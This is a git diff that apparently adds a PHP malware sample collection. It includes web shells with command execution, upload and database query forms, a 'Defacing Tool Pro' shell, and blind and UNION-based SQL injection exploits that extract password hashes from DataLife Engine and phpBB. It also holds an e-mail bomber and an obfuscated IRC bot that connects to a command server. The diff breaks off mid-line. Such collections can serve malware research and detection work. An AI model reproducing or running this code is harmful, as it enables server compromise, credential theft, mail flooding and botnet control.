    +			else $dir=$_REQUEST['dir'];
    +		$fname=$HTTP_POST_FILES['file_name']['name'];
    +		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
    +			die('file uploading error.');
    +}
    +if(isset($_REQUEST['mquery'])){
    +	
    +	$host=$_REQUEST['host'];
    +	$usr=$_REQUEST['usr'];
    +	$passwd=$_REQUEST['passwd'];
    +	$db=$_REQUEST['db'];
    +	$mquery=$_REQUEST['mquery'];
    +	mysql_connect("$host", "$usr", "$passwd") or
    +    die("Could not connect: " . mysql_error());
    +    mysql_select_db("$db");
    +    $result = mysql_query("$mquery");
    +	if($result!=FALSE) echo "

    query was executed correctly

    \n"; + while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row); + mysql_free_result($result); + die; +} +?> +
    execute command:
    +
    +upload file: to dir:   
    +
    to browse go to http://?d=[directory here] +
    for example: +http://?d=/etc on *nix +or http://?d=c:/windows on win +
    execute mysql query: +
    +host: user: password: + +database: query: +
    + + diff --git a/PHP/Cythosia.7z b/PHP/Cythosia.7z new file mode 100644 index 00000000..58197e71 Binary files /dev/null and b/PHP/Cythosia.7z differ diff --git a/PHP/Exploit.PHP.Deftool.a b/PHP/Exploit.PHP.Deftool.a new file mode 100644 index 00000000..60084b3a --- /dev/null +++ b/PHP/Exploit.PHP.Deftool.a @@ -0,0 +1,164 @@ + +xterm at /usr/X11R6/bin/xterm, "; +if (@file_exists("/usr/bin/nc")) $pro2="nc at /usr/bin/nc, "; +if (@file_exists("/usr/bin/wget")) $pro3="wget at /usr/bin/wget, "; +if (@file_exists("/usr/bin/lynx")) $pro4="lynx at /usr/bin/lynx, "; +if (@file_exists("/usr/bin/gcc")) $pro5="gcc at /usr/bin/gcc, "; +if (@file_exists("/usr/bin/cc")) $pro6="cc at /usr/bin/cc "; +$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6; +$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid(); +$ip=@gethostbyname($_SERVER['HTTP_HOST']); + +//Turns the 'ls' command more usefull, showing it as it looks in the shell +if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd); +else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd); +else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd); +else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd); +else if($cmd=='ls') $cmd = "ls -F"; + +//If there are some '//' in the cmd, its now removed +if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir); +?> + + + + + + + + + +
    [ Defacing Tool Pro v ]
    +by r3v3ng4ns - revengans@hotmail.com +
    + + + + + + + + +
    :
    user: uid() euid() gid()
    write permission:YES"; }else{ echo " no"; } ?>
    server info:
    pro info: ip
    original path:
    current path: +
    +
    + +
    command
    +
    +&1"); +$output=ob_get_contents();ob_end_clean(); +?> +
    +

    stdOut from $cmdShow\", using $feshow()";?>
    +
    diff --git a/PHP/Exploit.PHP.Inject.e b/PHP/Exploit.PHP.Inject.e new file mode 100644 index 00000000..19b646cf --- /dev/null +++ b/PHP/Exploit.PHP.Inject.e @@ -0,0 +1,98 @@ + Lite Version for DLE <=4.1 < > +'; + +if ($argc < 2 ){ +print " Usage: " . $argv[0] . " [table prefix]\n"; +print " ex.: " . $argv[0] . " datalife.engine.net admin\n"; +credits(); +exit; +} + +//DEFINE USER ID +$urla = 'http://' . $argv[1] . '/index.php?subaction=userinfo&user=' . $argv[2]; +$result = file_get_contents($urla); +$str1 = 'user='; #index.php?do=pm&doaction=newpm&user= +$position = strpos($result, $str1); + +if ($position === false){ print "\n\rSorry, no match found for user " . $argv[2]; credits();} +$str2 = '">'; +$pos = strpos($result, $str2, $position); +$pos1 = $position+5; +$user_id = intval(substr($result, $pos1, $pos-$pos1)); + +print "Trying to get hash for password of user ". $argv[2] ." with id=" . $user_id . ":\n"; + +//SOME defines (aka CONFIG =)) +if (empty($argv[3])){ $prefix = 'dle_';} #define prefix of the tables. try to find it yourself =) it is easy =) +else {$prefix = $argv[3];} +$min = 48; # 0 +$max = 122; # z +if (check(">$min", 1) == 0 && check("<$max", 1) == 0) {print "\n Site is unvulnerable..."; credits();} +for ($sn=1; $sn <= 32; $sn++) { + blind($sn, $min, $max); +} +credits(); + + +// REQUEST function +function check($crcheck, $sn) +{ + global $argv, $user_id, $prefix; +$host = 'http://' . $argv[1] . '/index.php'; # argv[1] - host +$name = $argv[2]; #user name +$query = '?subaction=userinfo&user=' . $name .'%2527%20and%20ascii(substring((SELECT%20password%20FROM%20' . $prefix. 'users%20WHERE%20user_id='. $user_id .'),' . $sn . ',1))' .$crcheck . '/*'; # + +$http = $host . $query; +#DEBUG +#print $http . "\n"; + $result = file_get_contents($http); + + // checking the answer + $string = ': '.$name.''; #CORRECT it FOR your version, kids =) +#good idea is: 'do=pm&doaction=newpm&user='.$user_id; + + if (eregi($string, $result)) { return 1; } + + return 0; +} + +//range function +function blind($sn, $fmin, $fmax) +{ + if (($fmax-$fmin)<5) { if (crack($fmin, $fmax, $sn) == 0){print "\n\rEXPLOIT FAILED..."; credits();} return;} + $compare = intval($fmin + ($fmax-$fmin)/2); + $crcheck = ">". $compare; + if ( check($crcheck, $sn) == 1 ) { + blind($sn, $compare, $fmax); + } + else { + blind($sn, $fmin, $compare+1); } +} + +//brute function +function crack($cmin, $cmax, $sn) +{ + for ($i=$cmin; $i <=$cmax; $i++){ + $crcheck = "=$i"; + if (check($crcheck, $sn) == 1){print chr($i); return 1;} + } +return 0; +} + + +function credits(){ +print "\n\n+========================================+\n\r Credits: 1dt.w0lf & foster \n\r Copyright (c) RST/GHC"; +print "\n\r http://rst.void.ru && http://ghc.ru\n\r+========================================+\n"; +exit; +} + +?> + diff --git a/PHP/Exploit.PHP.Inject.h b/PHP/Exploit.PHP.Inject.h new file mode 100644 index 00000000..8de1fdf5 --- /dev/null +++ b/PHP/Exploit.PHP.Inject.h @@ -0,0 +1,293 @@ +#!/usr/bin/php -q -d short_open_tag=on + 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$user=$argv[3]; +$pass=$argv[4]; +$port=80; +$prefix="PHPBB_"; +$user_id="2";//admin +$discl=0; +$proxy=""; +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +if ($temp=="-T") +{ + $prefix=str_replace("-T","",$argv[$i]); +} +if ($temp=="-u") +{ + $user_id=str_replace("-u","",$argv[$i]); +} +if ($temp=="-x") +{ + $discl=1; +} +} + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +$data="username=".urlencode($user); +$data.="&password=".urlencode($pass); +$data.="&redirect=index.php"; +$data.="&login=Login"; +$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n"; +$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Accept-Encoding: text/plain\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +$cookie=""; +$temp=explode("Set-Cookie: ",$html); +for ($i=1; $i<=count($temp)-1; $i++) +{ + $temp2=explode(" ",$temp[$i]); + $cookie.=" ".$temp2[0]; +} +if (eregi("_u=1;",$cookie)) +{ +//echo $html."\n";//debug +//die("Unable to login..."); +} +echo "cookie -> ".$cookie."\r\n"; +if ($discl) +{ +$sql="'suntzuuuuu"; +echo "sql -> ".$sql."\n"; +$sql=urlencode(strtoupper($sql)); +$data="username="; +$data.="&icq="; +$data.="&email="; +$data.="&aim="; +$data.="&joined_select=lt"; +$data.="&joined="; +$data.="&yahoo="; +$data.="&active_select=lt"; +$data.="&active="; +$data.="&msn="; +$data.="&count_select=eq"; +$data.="&count="; +$data.="&jabber="; +$data.="&sk=c"; +$data.="&sd=a"; +$data.="&ip=".$sql; +$data.="&search_group_id=0"; +$data.="&submit=Search"; +$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n"; +$packet.="Cookie: ".$cookie." \r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +if (strstr($html,"You have an error in your SQL syntax")) +{ +$temp=explode("posts",$html); +$temp2=explode(" ",$temp[0]); +$prefix=strtoupper($temp2[count($temp2)-1]); +echo "prefix -> ".$prefix."\n";sleep(2); +} +} + +$md5s[0]=0;//null +$md5s=array_merge($md5s,range(48,57)); //numbers +$md5s=array_merge($md5s,range(97,102));//a-f letters +//print_r(array_values($md5s)); +$j=1;$password=""; +while (!strstr($password,chr(0))) +{ +for ($i=0; $i<=255; $i++) +{ +if (in_array($i,$md5s)) +{ + $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; + echo "sql -> ".$sql."\n"; + $sql=urlencode(strtoupper($sql)); + $data="username="; + $data.="&icq="; + $data.="&email="; + $data.="&aim="; + $data.="&joined_select=lt"; + $data.="&joined="; + $data.="&yahoo="; + $data.="&active_select=lt"; + $data.="&active="; + $data.="&msn="; + $data.="&count_select=eq"; + $data.="&count="; + $data.="&jabber="; + $data.="&sk=c"; + $data.="&sd=a"; + $data.="&ip=".$sql; + $data.="&search_group_id=0"; + $data.="&submit=Search"; + $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; + $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Content-Length: ".strlen($data)."\r\n"; + $packet.="Connection: Close\r\n"; + $packet.="Cookie: ".$cookie." \r\n\r\n"; + $packet.=$data; + sendpacketii($packet); + if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;} + } + if ($i==255) {die("Exploit failed...");} +} +$j++; +} + +$j=1;$admin=""; +while (!strstr($admin,chr(0))) +{ +for ($i=0; $i<=255; $i++) +{ + $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; + echo "sql -> ".$sql."\n"; + $sql=urlencode(strtoupper($sql)); + $data="username="; + $data.="&icq="; + $data.="&email="; + $data.="&aim="; + $data.="&joined_select=lt"; + $data.="&joined="; + $data.="&yahoo="; + $data.="&active_select=lt"; + $data.="&active="; + $data.="&msn="; + $data.="&count_select=eq"; + $data.="&count="; + $data.="&jabber="; + $data.="&sk=c"; + $data.="&sd=a"; + $data.="&ip=".$sql; + $data.="&search_group_id=0"; + $data.="&submit=Search"; + $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; + $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Content-Length: ".strlen($data)."\r\n"; + $packet.="Connection: Close\r\n"; + $packet.="Cookie: ".$cookie." \r\n\r\n"; + $packet.=$data; + sendpacketii($packet); + if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;} + } + if ($i==255) {die("Exploit failed...");} +$j++; +} +echo "--------------------------------------------------------------------\r\n"; +echo "admin -> ".$admin."\r\n"; +echo "password (md5) -> ".$password."\r\n"; +echo "--------------------------------------------------------------------\r\n"; + +function is_hash($hash) +{ + if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} + else {return false;} +} + +if (is_hash($password)) {echo "Exploit succeeded...";} +else {echo "Exploit failed...";} +?> + diff --git a/PHP/Exploit.PHP.Userpic.a b/PHP/Exploit.PHP.Userpic.a new file mode 100644 index 00000000..a0633261 Binary files /dev/null and b/PHP/Exploit.PHP.Userpic.a differ diff --git a/PHP/Exploit.PHP.e b/PHP/Exploit.PHP.e new file mode 100644 index 00000000..2396a5da --- /dev/null +++ b/PHP/Exploit.PHP.e @@ -0,0 +1,503 @@ + + + + + + + +By xIgOr > AoD > CMD > File List + + + +#udp @ irc.mildnet.org +

    "; + print "

    "; + echo "

    "; + echo " "; + echo " "; + echo ""; + echo ""; + echo ""; + echo ""; +} +elseif (@$_GET['action'] == 'save') { + $filename = "$chdir".$_GET['file']; + $somecontent = $_POST['S1']; + $somecontent = stripslashes(trim($somecontent)); + if (is_writable($filename)) { + @$handle = fopen ($filename, "w"); + @$fw = fwrite($handle, $somecontent); + @fclose($handle); + if ($handle && $fw) { + $msg = "{$_GET['file']}edited successfully!"; + } + } else { + $msg = "{$_GET['file']}, cannot be written!"; + } +} + +// Informações + $cmdget = ''; + if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; } + if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; } + $cmdget = htmlspecialchars($cmdget); + function asdads() { + $asdads = ''; + if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; } + if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; } + if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; } + if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; } + if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; } + return $asdads; + } + +echo "

    "; +echo "
    "; +echo "Informações"; +echo ""; +echo ""; +echo "

    "; +echo ""; +echo ""; +echo ""; +echo "

    "; +echo ""; +echo ""; +echo ""; +echo "

    "; +echo ""; +echo ""; + if (strtoupper(substr($OS, 0,3) != 'WIN')) { + $Methods = asdads(); + if ($Methods == '') { $Methods = "???"; } + echo ""; + echo "

    "; + echo ""; + echo ""; + } + +echo ""; +echo "

    "; +echo ""; +echo ""; +echo ""; +echo "

    "; +echo ""; +echo ""; +echo "
    "; +echo "

    Sistema: 

     {$OS}
    "; +echo "

    Uname: 

     {$UNAME}
    "; +echo "

    PHP: 

     {$PHPv}, safe mode: {$SafeMode}
    "; + echo "

    Methods: 

     {$Methods}
    "; +echo "

    Ip: 

     {$IpServer}
    "; +echo "

    Command: 

      
    "; +echo "
    "; +// Dir + +echo "
    "; +echo "
    "; +if (is_writable("$chdir")) { + if (strtoupper(substr($OS, 0,3) == 'WIN')) { + echo "Dir YES: {$chdir} - [New Dir] [New File] [Remote Access]"; + } else { + echo "Dir YES: {$chdir} - [New Dir] [New File] [BackTool]"; + } +} +else { +if (strtoupper(substr($OS, 0,3) == 'WIN')) { + echo "Dir NO: {$chdir} - [New Dir] [New File] [Remote Access]"; + } else { + echo "Dir NO: {$chdir} - [New Dir] [New File] [BackTool]"; + } +} + +if (@!$handle = opendir("$chdir")) { + echo " I could not enters in the directory, click here! for return to the original directory!
    "; +} +else { +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +} else { + echo "

    $msg"; + } +echo "

    "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +$colorn = 0; + while (false !== ($file = readdir($handle))) { + if ($file != '.') { + if ($colorn == 0) { + $color = "style=\"background-color: #FFCC66\""; + } + elseif ($colorn == 1) { + $color = "style=\"background-color: #C0C0C0\""; + } + if (@is_dir("$chdir"."$file")) { + $file = $file.'/'; + $mode = 'chdir'; + } else { + $mode = 'edit'; + } + if (@substr("$chdir", strlen($chdir) -1, 1) != '/') { + $chdir .= '/'; + } + if ($file == '../') { + $lenpath = strlen($chdir); $baras = 0; + for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } } + $chdir_ = explode("/", $chdir); + $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir); + } + $perms = @fileperms ("$chdir"."$file"); + if ($perms == '') { + $perms = '???'; + } + $size = @filesize ("$chdir"."$file"); + $size = $size / 1024; + $size = explode(".", $size); + if (@$size[1] != '') { + $size = $size[0].'.'.@substr("$size[1]", 0, 2); + } else { + $size = $size[0]; + } + if ($size == 0) { + if ($mode == 'chdir') { + $size = '???'; + } + } + echo ""; + echo ""; + if (@is_writable ("$chdir"."$file")) { + if ($mode == 'chdir') { + if ($file == '../') { + echo ""; + } else { + echo ""; + } + } else { + if (is_readable("$chdir"."$file")) { + echo ""; + } else { + echo ""; + } + } + } + else { + if ($mode == 'chdir') { + if ($file == '../') { + echo ""; + } else { + echo ""; + } + } else { + if (@is_readable("$chdir"."$file")) { + echo ""; + } else { + echo ""; + } + } + } + echo ""; + if ($mode == 'edit') { + echo ""; + } else { + echo ""; + } + echo ""; + if ($colorn == 0) { + $colorn = 1; + } + elseif ($colorn == 1) { + $colorn = 0; + } + } + } + closedir($handle); +} +?> +
     Upload:"; +echo " "; +echo "
     
    "; +if (@!$msg) { + echo "

    Messages

     
     Perms File  Size  Commands
     $perms $file $file $file $file $file $file $file $file $size KB [Rename] [Del] [Chmod] [Copy] [Rename] [Del] [Chmod] [Copy]
    +
    +

    + Valid HTML 4.01 Transitional +

    + + + diff --git a/PHP/Flooder.PHP.MailSpam b/PHP/Flooder.PHP.MailSpam new file mode 100644 index 00000000..ca5bc8b6 --- /dev/null +++ b/PHP/Flooder.PHP.MailSpam @@ -0,0 +1,69 @@ + + + + +[- Xp|01t3R's -] - E-Mail Bomber + + + + +

    [*CyBeR tErRoRiStS*] + - E-Mail Bomber
    +

    +
    +

    To: + + +
    + From: + +

    +

    Subject : + +
    +
    + Message:
    + +

    +
    + Number Of Times To Send: + +
    + + +

    +
    +

    + + + +\n"; +$headers .= "X-Sender: <$from>\n"; +$headers .= "X-Mailer: PHP\n"; //mailer +$headers .= "X-Priority: 1\n"; //1 UrgentMessage, 3 Normal +$headers .= "Return-Path: <$from>\n"; +$headers .= "Content-Type: text/html; charset=iso-8859-1\n"; +$headers .= "cc:\n"; // CC to +$headers .= "bcc:"; // BCCs to, separete + +mail($to, $subject, $message, $headers) or die("Could Not Send Message"); + +$i++; +} + +die("Finished Sending Message $times Times to $to"); + +} +?> diff --git a/PHP/HackTool.PHP.Botctl.a b/PHP/HackTool.PHP.Botctl.a new file mode 100644 index 00000000..885d966a --- /dev/null +++ b/PHP/HackTool.PHP.Botctl.a @@ -0,0 +1,128 @@ + 8080, "sp" => "uJijk4iVsIXRmQ==", + "ch" => "aFaw", "ke" => "spd1iYSUqA==", "ha" => "dG1qQk1halK/nE6N", "pa" => "fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=", + "tr" => "*", "mrnd" => 9, "mo" => "cqtrig==", "ve" => "dmFyWA==" ); function tc8a89c2c306fb($m341be97d9aff9) { +$m341be97d9aff9 = str_replace(" ", "", $m341be97d9aff9); return $m341be97d9aff9; } function ob5d21085bf2c0($m341be97d9aff9) { +$m341be97d9aff9 = base64_decode(tc8a89c2c306fb($m341be97d9aff9)); return $m341be97d9aff9; } function rfc35fdc70d5fc() { +global $aec12e0af93cb5; $see11cbb19052e = array(); $td707b8140a662 = ""; $b59b514174bffe = array("sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==","sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR","rpihlYyTr5LWVKHDi6SRl0+jko4=","rZytgpFPr5TDlI7MmW6FiQ==","sKJuhYdPopDTi5bHlKVRhoY=","tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ","vaOokJFUbpPOi5jClLNRhoY=","sqywiZKPpVeMipjHlm6RiZU=","sqytlpaKo5eMipjHlm6RiZU="); +shuffle($b59b514174bffe); if(($j351a1d2ad68bc = fsockopen(jf9feaa9bcab30($b59b514174bffe[0]),$aec12e0af93cb5['po'],$k70106d0d82151,$d809b1abe3f111,15))) { +$m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); if (strlen($aec12e0af93cb5['sp'])>0) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UEFTUw==")." ".jf9feaa9bcab30($aec12e0af93cb5['sp'])); +} q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("VVNFUg==")." ".gfb0daa8f01135($aec12e0af93cb5['mrnd'])." 127.0.0.1 localhost :$m8052146769b14"); +q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); while (!feof($j351a1d2ad68bc)) { +$f7fabc1404929c = trim(fgets($j351a1d2ad68bc,512)); $h6e2baaf3b97db = explode(" ",$f7fabc1404929c); +if(($f7fabc1404929c == $td707b8140a662)) continue; if (isset($h6e2baaf3b97db[0]) && $h6e2baaf3b97db[0] == ob5d21085bf2c0("UElORw==")) { +q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UE9ORw==")." ".$h6e2baaf3b97db[1]); } else if (isset($h6e2baaf3b97db[1]) && $h6e2baaf3b97db[1] == ob5d21085bf2c0("MDAx")) { +q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TU9ERQ==")." $m8052146769b14 ".jf9feaa9bcab30($aec12e0af93cb5['mo'])); +q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("Sk9JTg==")." ".jf9feaa9bcab30($aec12e0af93cb5['ch'])." ".jf9feaa9bcab30($aec12e0af93cb5['ke'])); +} else if(isset($zdfff0a7fa1a55[1]) && $zdfff0a7fa1a55[1] == ob5d21085bf2c0("NDMz")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); +} else if (isset($h6e2baaf3b97db[1]) && isset($see11cbb19052e[$h6e2baaf3b97db[1]])) { unset($see11cbb19052e[$h6e2baaf3b97db[1]]); +} else if (isset($h6e2baaf3b97db[1]) && ($h6e2baaf3b97db[1] == ob5d21085bf2c0("UFJJVk1TRw==") || $h6e2baaf3b97db[1] == "332")) { +$n78e731027d8fd = strstr($f7fabc1404929c," :"); $n78e731027d8fd = substr($n78e731027d8fd,2); $zdfff0a7fa1a55 = explode(" ",$n78e731027d8fd); +$m67b3dba8bc677 = $h6e2baaf3b97db[0]; $v7c6483ddcd99e = explode("!",$m67b3dba8bc677); $v7c6483ddcd99e = substr($v7c6483ddcd99e[0],1); +$d73be252ca8221 = FALSE; if ($zdfff0a7fa1a55[0] == "\1".ob5d21085bf2c0("VkVSU0lPTg==")."\1") { q56eacb300613d($j351a1d2ad68bc,"NOTICE ".$v7c6483ddcd99e." :\1".ob5d21085bf2c0("VkVSU0lPTg==")." ".jf9feaa9bcab30($aec12e0af93cb5['ve'])."\1"); +} for ($i865c0c0b4ab0e=0;$i865c0c0b4ab0e1) { q56eacb300613d($j351a1d2ad68bc, substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0]))); +} break; case l69923efad5b7a("sKc="): if (isset($zdfff0a7fa1a55[1])) { $u954eef6d6eac5 = $zdfff0a7fa1a55[1]; +} else { $u954eef6d6eac5 = getcwd(); } if (is_dir($u954eef6d6eac5)) { if (($o736007832d216 = opendir($u954eef6d6eac5))) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8gTm93IGxpc3Rpbmc6") ." \2".$u954eef6d6eac5."\2"); +while (($k435ed7e9f07f7 = readdir($o736007832d216)) !== FALSE) { if ($k435ed7e9f07f7 != "." && $k435ed7e9f07f7 != "..") { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> (".filetype($u954eef6d6eac5."/".$k435ed7e9f07f7).") $k435ed7e9f07f7"); +sleep(1); } } closedir(); } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8gVW5hYmxlIHRvIGxpc3QgY29udGVudHMgb2Y=") . " \2".$u954eef6d6eac5."\2"); +} } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8=") . " \2".$u954eef6d6eac5."\2 " . ob5d21085bf2c0("aXMgbm90IGEgZGlyIQ==")); +} break; case l69923efad5b7a("p5Wp"): if (count($zdfff0a7fa1a55) > 1) { if (is_file($zdfff0a7fa1a55[1])) { +if (($k0666f0acdeed3 = fopen($zdfff0a7fa1a55[1],"r"))) { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=") . " \2".$zdfff0a7fa1a55[1]."\2"); +while(!feof($k0666f0acdeed3)) { $m6438c669e0d0d = trim(fgets($k0666f0acdeed3,256)); df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> $m6438c669e0d0d"); +sleep(1); } df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> [EOF]"); } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8gQ291bGRuJ3Qgb3Blbg==") . " \2".$zdfff0a7fa1a55[1]."\2 for reading."); +} } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8=") . " \2".$zdfff0a7fa1a55[1]."\2 " . ob5d21085bf2c0("aXMgbm90IGEgZmlsZQ==")); +} } break; case l69923efad5b7a("tKuZ"): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("UFdELy8gQ3VycmVudCBkaXI6") ." ".getcwd()); +break; case l69923efad5b7a("p5g="): if (count($zdfff0a7fa1a55) > 1) { if (chdir($zdfff0a7fa1a55[1])) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0QvLyBDaGFuZ2VkIGRpciB0bw==") ." ".$zdfff0a7fa1a55[1]); +} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg==")); +} } break; case l69923efad5b7a("tqE="): if (count($zdfff0a7fa1a55) > 1) { if (unlink($zdfff0a7fa1a55[1])) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk0vLyBEZWxldGVk") . " \2".$zdfff0a7fa1a55[1]."\2"); +} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk0vLyBGYWlsZWQgdG8gZGVsZXRl")." \2".$zdfff0a7fa1a55[1]."\2"); +} } break; case l69923efad5b7a("uKOqlZs="): if (count($zdfff0a7fa1a55) > 1) { if (touch($zdfff0a7fa1a55[1])) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VG91Y2gvLyBUb3VjaGVk") . " \2".$zdfff0a7fa1a55[1]."\2"); +} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=") . " \2".$zdfff0a7fa1a55[1]."\2"); +} } break; case l69923efad5b7a("t62inpySoA=="): if (count($zdfff0a7fa1a55) > 2) { if (symlink($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3ltTGluay8vIFN5bWxpbmtlZA==") . " 